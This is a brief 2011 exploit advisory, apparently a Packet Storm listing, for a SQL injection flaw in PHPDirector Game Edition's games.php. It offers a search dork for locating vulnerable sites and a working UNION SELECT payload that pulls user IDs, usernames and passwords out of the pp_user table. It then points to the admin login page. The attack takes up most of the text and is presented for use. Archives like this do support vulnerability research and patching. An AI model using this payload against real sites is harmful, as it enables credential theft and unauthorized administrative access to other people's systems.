PHPDirector Game Edition SQL Injection

2011-01-26T00:00:00
ID PACKETSTORM:97891
Type packetstorm
Reporter AtT4CKxT3rR0r1ST
Modified 2011-01-26T00:00:00

Description

                                        
                                            `PHPDirector Game Edition (game.php) Sql Injection Vulnerability  
================================================================  
  
####################################################################  
.:. Author : AtT4CKxT3rR0r1ST [F.Hack@w.cn]  
.:. Script : http://scriptsgratuits.info/Scripts/PHP/Jeux/PHPDirector-Game-Edition_7.html  
.:. Dork : "Powered by PHPD Game Edition"  
.:. Home : www.Hack-Book.com  
.:. Gr34T$ T0 [h1ch4m] & [Risky] & [ZaIdOoHxHaCkEr] & [The Sword]  
  
####################################################################  
  
===[ Exploit ]===  
  
www.site.com/games.php?id=null[Sql Injection]  
  
www.site.com/games.php?id=null+and+1=2+union+select+1,group_concat(id,0x3a,user,0x3a,pass),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17+from+pp_user  
  
===[ Admin Panel ]===  
  
www.site.com/admin/login.php  
  
  
####################################################################  
  
`